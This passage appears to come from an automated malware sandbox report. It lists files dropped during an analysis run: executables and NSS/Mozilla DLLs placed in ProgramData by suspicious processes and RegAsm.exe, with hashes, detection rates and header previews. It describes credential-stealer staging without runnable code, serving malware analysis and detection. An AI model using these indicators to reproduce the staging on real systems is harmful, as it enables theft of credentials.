                                                                                                                                                                                                                                Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERA06C.tmp.txt

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):13340
                                                                                                                                                                                                                                Entropy (8bit):2.684741706463871
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:TiZYW3D97Ba+Y1Y45zrW58HhYEZ5matdi3EvqBPwQ6nGMaQp3M9fWMvIbu3:2ZD3JilmDNcTaQp3M9fdAbu3
                                                                                                                                                                                                                                MD5:E29AAC27C3E150CBDBF041F3C32C1154
                                                                                                                                                                                                                                SHA1:338E1C08F5DFA07C0A20F6F99192F7044B1DEA11
                                                                                                                                                                                                                                SHA-256:F95B2ED44782933757BC7055688E237C72154F36AAF1DFFDAE5CC6543A9310B7
                                                                                                                                                                                                                                SHA-512:0B1FA32898F9861BA829820EE39443053519DEA9E32C50F85637054B8E79E5198BB123B7FFC8F7A73EE0A5F4BEB91088230066F27F38490ACF97DBE626D02FEA
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERA29F.tmp.txt

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):13340
                                                                                                                                                                                                                                Entropy (8bit):2.6848623160226883
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:TiZYW3KGQZjrkYsaYfWTbHbYEZn/VtdiKEqw2wZ9BXaHpiMxaKtIz+u3:2ZD3hm1dODXaHpiMxaKyz+u3
                                                                                                                                                                                                                                MD5:D21380892B24AB4340DC0CD51B1749A6
                                                                                                                                                                                                                                SHA1:81FF0B8F092422E4CC9987F66DDFDB543EB9E389
                                                                                                                                                                                                                                SHA-256:DF89FF0CFBE581507E781E7935FC31A8477A956F4C481F0AA0FFE3B5A5892892
                                                                                                                                                                                                                                SHA-512:7B67989A60445108165CEF1BC6C4A6B97EA01DC54BF8416A534C82B608C79EEB00A28863E4C06550D6CD0FBEC6EE6BA95181A916C854AF3205A3D6E25B1306FE
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERB26F.tmp.csv

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):96282
                                                                                                                                                                                                                                Entropy (8bit):3.1093427773845193
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:d07pe7C9UK1XGNH7Bvb8HajfkX3jZGgBoYL4z+xhBRyqAEsfcQTyQXYTIt5bKX7g:d07pe7C9UK1XGNH7Bvb8HajsX3jZGgBS
                                                                                                                                                                                                                                MD5:E6526B004765DEB68509526C79DBCEDA
                                                                                                                                                                                                                                SHA1:D0DBF8FC98B48113465582C42C50CCBA48783A26
                                                                                                                                                                                                                                SHA-256:9322A238B262E1F6DE93A88DCF02D2A0B63D3FDB0E0DD712A19472B4C1752436
                                                                                                                                                                                                                                SHA-512:B37CE0D02C8B5B6E8E76227C313BB6A7DAE3A7F21443869ECC924011AAED3F572424D6E8583F41D49F92F665D7CFE5D876CD0B9E40FFFE8B253A71B3C9FDEB7A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WERB8D9.tmp.txt

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):13340
                                                                                                                                                                                                                                Entropy (8bit):2.6863681294160666
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:TiZYW3fduFxYQU3Y8WoSHPYEZ093tdiTMGDmUwFn08aFp8MIQxyI9u3:2ZD3AVct9amnVaFp8MIQxV9u3
                                                                                                                                                                                                                                MD5:61990F2D62AB6D847BC6593948F465CA
                                                                                                                                                                                                                                SHA1:5A3724739E6D0FC3837EBC847CB9D20EF2D5A74C
                                                                                                                                                                                                                                SHA-256:9471CFCEB8DE5AEE4016FC5CA60710BD894AC382218FABA00D6261D1E0D24E79
                                                                                                                                                                                                                                SHA-512:DFDD032F2DFD9ACC8F612F54EA0CCD81EF1AD6B5E60941E14AB77831AA57CF3FBE6DDC102BB37FE4FD2B1F6E988AB05FC031951D7113EF5865AB01A9B3BB220C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                                                                                C:\ProgramData\ejitkpfdxvzt\orpqcnvisucm.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Documents\iofolko5\_U2YDEzm5f5t9soM_Qc1Hc4U.exe
                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):11496960
                                                                                                                                                                                                                                Entropy (8bit):7.95681767955623
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:196608:0GTSo6ARyCFMI19DwkfAuYI8wha0mlCGMbM77RWWuhJzoSpc92tQRqIDfrDap1B6:0GTz6uyCfDwkfAuH8kv477RWXJs59Nqs
                                                                                                                                                                                                                                MD5:D60D266E8FBDBD7794653ECF2ABA26ED
                                                                                                                                                                                                                                SHA1:469ED7D853D590E90F05BDF77AF114B84C88DE2C
                                                                                                                                                                                                                                SHA-256:D4DF1ABA83289161D578336E1B7B6DAF7269BB73ACC92BD9DFA2C262EBC6C4D2
                                                                                                                                                                                                                                SHA-512:80DF5D568E34DFC086F546E8D076749E58A7230ED1AA33F3A5C9D966809BECADC9922317095032D6E6A7ECDFBFBCE02A72CC82513AB0D132C5FFA6C07682BD87
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 54%
                                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 64%, Browse
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....+.f..........#.................]p.........@.............................`............ .....................................................<....P......@...`*...........................................F..(.......8............... ............................text...6........................... ..`.rdata..............................@..@.data...............................@....pdata..............................@..@.00cfg..............................@..@.tls................................@....text0..p.-......................... ..`.text1..X...........................@....text2...`.......b..................`..h.rsrc........P.......h..............@..@........................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\freebl3.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):685392
                                                                                                                                                                                                                                Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\jewkkwnf\jewkkwnf.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1075200
                                                                                                                                                                                                                                Entropy (8bit):7.828820550765554
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24576:WdYRGW0Hr/0s93L2wy3Dz39bQw4D68c1y3wYx0DRTejblcicS32UxibH:6YRGWYJqw0DL9swKw18wG0DRTejblci0
                                                                                                                                                                                                                                MD5:8C8AF20BF6536903C1D042CEBEDE6475
                                                                                                                                                                                                                                SHA1:8EF42ABC3AD478F6D8C17691FE4CC1975CA43684
                                                                                                                                                                                                                                SHA-256:B15BDB0A4D7F265CF4ED7C46668F4CA247347CA2CE4A7689CB8DBB25863F294A
                                                                                                                                                                                                                                SHA-512:8F68E5302D07FB74DDE0E42E0D370E1CB7C1D6B0372633FCFAAB95CD1D12F9786C4E44E71B3CC98EEEB60EA10F54497773C3B4AA58AFA5297FAD93A3F11097E0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 42%
                                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 33%, Browse
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................P..@...&.......^... ...`....@.. ...............................D....@..................................]..O....`..F#...........................]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc...F#...`...$...B..............@..@.reloc...............f..............@..B.................]......H........D...J..............`.............................................(....*&..(.....*.s.........s ........s!........s"........s#........*...0...........~....o$....+..*.0...........~....o%....+..*.0...........~....o&....+..*.0...........~....o'....+..*.0...........~....o(....+..*.0..<........~.....().....,!r...p.....(*...o+...s,............~.....+..*.0...........~.....+..*".......*.0..&........(....r)..p~....o-...(......t.....+..*Vs....(/...t.........*..(0...*.0..........

                                                                                                                                                                                                                                C:\ProgramData\jewkkwnf\jewkkwnf.exe6Wob1mDxY9zsd70j (copy)

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1075200
                                                                                                                                                                                                                                Entropy (8bit):7.828820550765554
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24576:WdYRGW0Hr/0s93L2wy3Dz39bQw4D68c1y3wYx0DRTejblcicS32UxibH:6YRGWYJqw0DL9swKw18wG0DRTejblci0
                                                                                                                                                                                                                                MD5:8C8AF20BF6536903C1D042CEBEDE6475
                                                                                                                                                                                                                                SHA1:8EF42ABC3AD478F6D8C17691FE4CC1975CA43684
                                                                                                                                                                                                                                SHA-256:B15BDB0A4D7F265CF4ED7C46668F4CA247347CA2CE4A7689CB8DBB25863F294A
                                                                                                                                                                                                                                SHA-512:8F68E5302D07FB74DDE0E42E0D370E1CB7C1D6B0372633FCFAAB95CD1D12F9786C4E44E71B3CC98EEEB60EA10F54497773C3B4AA58AFA5297FAD93A3F11097E0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 42%
                                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 33%, Browse
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................P..@...&.......^... ...`....@.. ...............................D....@..................................]..O....`..F#...........................]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc...F#...`...$...B..............@..@.reloc...............f..............@..B.................]......H........D...J..............`.............................................(....*&..(.....*.s.........s ........s!........s"........s#........*...0...........~....o$....+..*.0...........~....o%....+..*.0...........~....o&....+..*.0...........~....o'....+..*.0...........~....o(....+..*.0..<........~.....().....,!r...p.....(*...o+...s,............~.....+..*.0...........~.....+..*".......*.0..&........(....r)..p~....o-...(......t.....+..*Vs....(/...t.........*..(0...*.0..........

                                                                                                                                                                                                                                C:\ProgramData\mozglue.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):608080
                                                                                                                                                                                                                                Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\msvcp140.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):450024
                                                                                                                                                                                                                                Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\nss3.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2046288
                                                                                                                                                                                                                                Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\ProgramData\softokn3.dll

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):257872
                                                                                                                                                                                                                                Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                                                                                                                                                                                                Reputation:unknown
